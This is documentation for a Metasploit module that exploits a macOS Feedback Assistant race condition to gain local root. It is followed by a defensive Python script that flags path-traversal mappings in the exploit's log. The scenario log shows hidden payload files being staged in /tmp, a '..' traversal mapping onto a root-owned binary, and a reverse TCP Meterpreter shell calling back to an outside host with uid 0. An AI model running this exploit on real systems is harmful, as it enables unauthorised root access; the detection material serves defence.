GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/osx/local/feedback_assistant_root.md

## Vulnerable Application

This module exploits a race condition in macOS Feedback Assistant that results in local privilege escalation to root.

## Scenarios

```
msf5 exploit(osx/local/feedback_assistant_root) > check
[*] The target appears to be vulnerable.
msf5 exploit(osx/local/feedback_assistant_root) > run

[*] Started reverse TCP handler on 172.16.135.1:5555
[*] Uploading file: '/tmp/.fjbgrf'
[*] Uploading file: '/tmp/.fljhjbwe'
[*] Executing exploit '/tmp/.fljhjbwe'
[*] Transmitting first stager...(210 bytes)
[*] Exploit result:
2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] canary: /usr/local/bin/netdiagnose
2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] dictionary: {
    "/var/log/../../../var/folders/bg/sp3s48cs1zn3yvtgjrn6ggs00000gn/T/44E5C7D8-2B40-472C-9073-F734E924F662-1059-000002240EBB72B8/bin/root.sh" = "/tmp/../../usr/local/bin/netdiagnose";
}
2019-05-20 10:36:13.750 .fljhjbwe[1059:12661] [LightYear] Now race
2019-05-20 10:36:13.881 .fljhjbwe[1059:12661] [LightYear] Stage 1 succeed
2019-05-20 10:36:14.099 .fljhjbwe[1059:12663] [LightYear] It works!

[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (808504 bytes) to 172.16.135.130
[*] Meterpreter session 2 opened (172.16.135.1:5555 -> 172.16.135.130:49256) at 2019-05-20 12:36:14 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
```
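The `dictionary:` line in the output above is the most useful artifact for a defender: a file under the user's own `/var/folders/.../T/` directory is mapped, through `..` traversal on both sides, onto the root-owned binary `/usr/local/bin/netdiagnose`. The following is an added example (not part of the Metasploit module or its documentation) that parses that dump, normalizes both paths lexically, and flags any mapping whose normalized source is user-writable while its normalized destination is a privileged location. The `PRIVILEGED_PREFIXES` and `USER_WRITABLE_PREFIXES` lists are assumptions for the example; the sample log is constructed from the two `[LightYear]` lines shown above.

```python
import os
import re
from typing import Dict, List, Tuple

# Constructed sample: the "[LightYear]" lines from the session log above,
# reproduced here so the example runs offline.
SAMPLE_LOG = """\
2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] canary: /usr/local/bin/netdiagnose
2019-05-20 10:36:13.749 .fljhjbwe[1059:12661] [LightYear] dictionary: {
    "/var/log/../../../var/folders/bg/sp3s48cs1zn3yvtgjrn6ggs00000gn/T/44E5C7D8-2B40-472C-9073-F734E924F662-1059-000002240EBB72B8/bin/root.sh" = "/tmp/../../usr/local/bin/netdiagnose";
}
"""

# Assumed policy lists for this example; extend them to match local policy.
# Destinations that a user-controlled file should never reach via traversal.
PRIVILEGED_PREFIXES = ("/usr/local/bin", "/usr/bin", "/bin", "/sbin",
                       "/usr/sbin", "/Library/LaunchDaemons")
# Locations an unprivileged process can normally write to on macOS.
USER_WRITABLE_PREFIXES = ("/tmp", "/private/tmp", "/var/folders", "/private/var/folders")

# One '"src" = "dst";' entry of the NSDictionary-style dump.
PAIR_RE = re.compile(r'"([^"]+)"\s*=\s*"([^"]+)";')


def parse_dictionary(log: str) -> Dict[str, str]:
    """Extract every "src" = "dst"; pair from the dumped dictionary."""
    return {src: dst for src, dst in PAIR_RE.findall(log)}


def normalize(path: str) -> str:
    """Collapse '.' and '..' lexically; '..' above '/' is dropped, as the kernel does."""
    return os.path.normpath(path)


def under(path: str, prefixes) -> bool:
    """True if the normalized path equals or lies below one of the prefixes."""
    p = normalize(path)
    return any(p == pre or p.startswith(pre.rstrip("/") + "/") for pre in prefixes)


def has_traversal(path: str) -> bool:
    """True if the raw (un-normalized) path contains a '..' component."""
    return ".." in path.split("/")


def suspicious_mappings(log: str) -> List[Tuple[str, str, str]]:
    """Return (raw_src, normalized_src, normalized_dst) for each mapping that
    uses '..' traversal to point a user-writable source at a privileged destination."""
    findings = []
    for src, dst in parse_dictionary(log).items():
        n_src, n_dst = normalize(src), normalize(dst)
        if ((has_traversal(src) or has_traversal(dst))
                and under(n_src, USER_WRITABLE_PREFIXES)
                and under(n_dst, PRIVILEGED_PREFIXES)):
            findings.append((src, n_src, n_dst))
    return findings


if __name__ == "__main__":
    for raw_src, n_src, n_dst in suspicious_mappings(SAMPLE_LOG):
        print(f"user-writable {n_src}\n  -> privileged {n_dst}\n  (raw: {raw_src})")
```

Lexical normalization is deliberate here: the check is meant to run over a captured log, not on the live filesystem, so no symlinks are resolved and nothing is touched. When the same check is applied at the point a path is accepted from a user, resolve the final path with `os.path.realpath` as well, since a symlink planted in the user-writable directory can redirect a lexically clean path.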